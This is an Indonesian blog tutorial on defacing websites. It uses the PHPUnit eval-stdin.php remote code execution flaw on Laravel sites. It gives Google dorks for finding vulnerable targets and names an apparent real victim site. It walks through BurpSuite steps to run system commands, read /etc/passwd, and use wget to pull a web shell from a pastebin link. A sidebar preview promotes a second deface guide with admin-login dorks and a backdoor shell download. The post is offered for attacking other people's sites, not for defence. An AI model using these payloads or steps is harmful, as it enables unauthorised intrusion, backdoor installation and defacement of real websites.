Skip to main content

Tutorial deface POC Laravel phpUnit UPLOAD SHELL

Tutorial deface POC Laravel phpUnit UPLOAD SHELV


Setelah sekian lama kami tidak update seputar deface kali ini kami akan berbagi tutorial tentang Laravel phpUnit UPLOAD SHELL.

       Teknik yang satu ini memanfaatkan sebuah bug dari Fitur yang di sediakan oleh pengguna laravel yaitu php unit dengan cara menggunakan remote code execution (RCE)

Tutorial / Cara Upload Shell Metode Laravel phpUnit to RCE( Remote Code Execution ) dengan BurpSuite
Pertama siapkan :
- BurpSuite ( download di google banyak )
- Browser

Dorking di google :
- inurl:vendor/phpunit/phpunit/src/
- inurl:/src/Util/PHP/ intitle:index of
- inurl:/Util/PHP/ "eval-stdin.php"
* kembangin lagi biar dapet target lebih fresh

Exploit : /eval-stdin.php
site.co.li/vendor/phpunit/phpunit/src/Util/PHP/eval.stdin.php
* kalau blank putih berarti vuln
Oke langsung aja, disini gua udh dapet targetnya :
http://www.olapcemetery.com//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Buka BurpSuite > ke menu Proxy > pilih Intercept > nyalakan Intercept ( Intercept On )
Lalu kalian buka target yang tadi, dan buka BurpSuite lagi.

Jika sudah, klik kanan dan pilih Send to Repeater / Ctrl + R
Masuk ke Repeater, lihat kolom kiri adalah requestnya dan responsnya berada di sebelah kanan.
Nah sekarang saatnya mengeksekusi :v
Masukkan payload <?php system('ls');?> di kolom request, gunanya agar melihat isi dalam dir /PHP/ atau bisa juga dengan <?php system('tail /etc/passwd');?> untuk melihat isi dari /etc/passwd nya, terus klik " Go ".

Nanti kalo bisa di eksekusi bakal muncul responsnya disebelah kanan, lihat gambar.
Kalo gamuncul berarti gbs di eksekusi.

Langsung aja kita tusbool gan dgn perintah wget buat manggil shell kita

- <?php system('wget link shell lu -o px.php'); ?>
     atau lu bisa pake link shell gua
- <?php system('wget https://pastebin.com/raw/E5fXkdyC -o px.php'); ?>
Nb : px.php bisa ganti terserah kamu, buat namain file shell yg kita upload
Nah shell px.php gua udh ke upload, tinggal buka aja deh :*
Shell telah terupload :V


Comments

Popular posts from this blog

Cara Belajar Bahasa Pemrograman PHP dan MySQL

Cara Belajar Bahasa Pemrograman PHP dan MySQL         halo sobat , Mr.TUKEN di sini  Bersyukur masih di beri kesempatan sama tuhan untuk berbagi materi dengan sobat Setia semuanya kali ini saya mau ngasih materi Cara Belajar Bahasa Pemrograman PHP dan MySQL        nah PHP merupakan salah satu bahasa pemrograman yang paling banyak digunakan dalam internet, yang mana memungkinkan Anda untuk melakukan banyak hal dan lebih mudah daripada HTML. MySQL memungkinkan Anda untuk membuat dan merubah database pada server Anda. Dengan menggunakan keduanya, Anda akan bisa membuat situs dan database yang jauh lebih kompleks dan juga lebih baik. Banyak yang harus Anda pelajari untuk mampu menguasai PHP dan MySQL dengan baik, namun Anda dapat mempelajari dasarnya dengan mudah pada artikel ini. Bagian 1 dari 5: Persiapan  1.Mengerti apa itu PHP dan MySQL. PHP merupakan bahasa pemrograman yang dapat Anda gunakan u...

Cara deface poc bypass admin (upload shell)

Cara deface poc bypass admin (upload shell)         Halo guys sorry lama tidak update,kali ini saya akan share tutorial Deface poc bypass admin yang jelas upload shell ya.        deface poc ini bisa dibilang gampang-gampang susah ya guys:v. Mengapa demikian karena poc ini gampang saat mengeksekusinya tapi susah nyari web yang fresh(terkecuali kalian Pinter racik dork fresh).         Ok langsung aja ya. Bahan-bahannya: 1. Dork 2. Koneksi  3. Shell Backdoor ( Download disini  )  password shell: Mr.TUKEN Mini shell( Download disini ) 4. Script deface  5. Kopi  6. Rokok  7. Doa Langkah-langkah: 1.  Silahkan kalian dorking di mbah google terlebih dahulu menggunakan dork berikut: Admin.php?id= Admin/login.php Login.php intitle:"admin login" Login.php intitle:"admin area " Login.php intitle:"administrator " Administrator.php Note: kalian juga bisa menargetkan site...